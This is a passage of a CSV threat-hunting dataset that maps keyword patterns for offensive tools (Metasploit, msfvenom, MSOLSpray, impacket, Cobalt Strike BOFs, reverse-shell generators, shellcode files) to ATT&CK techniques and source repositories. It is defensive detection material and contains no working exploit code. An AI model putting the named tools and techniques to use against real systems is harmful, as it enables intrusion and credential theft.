T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*msfpattern.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfpayload*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfpc.sh*","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","10","1129","275","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" +"*msfrelay.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-revhttps*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*MSFRottenPotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MSFRottenPotato.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-sgn.raw*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*msfupdate_spec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfvemonpayload*","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","36","8","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" +"*msfvenom *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*msfvenom -*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfvenom -*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*--msfvenom *","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*Mshikaki.exe*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"*Mshikaki-main*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"*mshta/shellcode_inject*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*MSHTAStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*msi-search-main.zip*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*msLDAPDump.py*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*MSOfficeManipulator.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*msol_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*msol_dump.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*MSOLSpray *","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","0","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray.git*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray.ps1*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*MSOLSpray-master*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*mspass.exe*","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*mspass.zip*","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*msquic_openssl/msquic.dll*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*msquic_openssl/msquic.lib*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*MS-RPNVulnerableDC.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*MS-RPRN.exe *","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. Binary from here https://github.com/leechristensen/SpoolSample","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*MS-RPRN.exe \\* \\*/pipe/pwned*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*mssgbox_shellcode_arranged_x64.b64*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*mssgbox_shellcode_exitfunc_thread_x64.bin*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*mssgbox_shellcode_x64.b64*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*mssgbox_shellcode_x64.bin*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*mssgbox_shellcode_x64.bin*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*mssgbox_shellcode_x64_with_hexsymbol.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*mssgbox_shellcode_x64_without_hexsymbol.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*mssql_brute.rc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mssql_local_auth_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mssql_local_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mssqlattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*mssqlattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mssqlproxy-master*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" +"*mssqlrelayclient.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mssqlrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*mssqlsvc.kirbi*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*mthbernardes*rsg*","offensive_tool_keyword","rsg","A tool to generate various ways to do a reverse shell","T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007","TA0002 - TA0011 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/mthbernardes/rsg","1","1","N/A","N/A","6","541","133","2023-04-27T10:32:21Z","2017-12-12T02:57:07Z" +"*mttaggart/OffensiveNotion*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*multi_meter_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 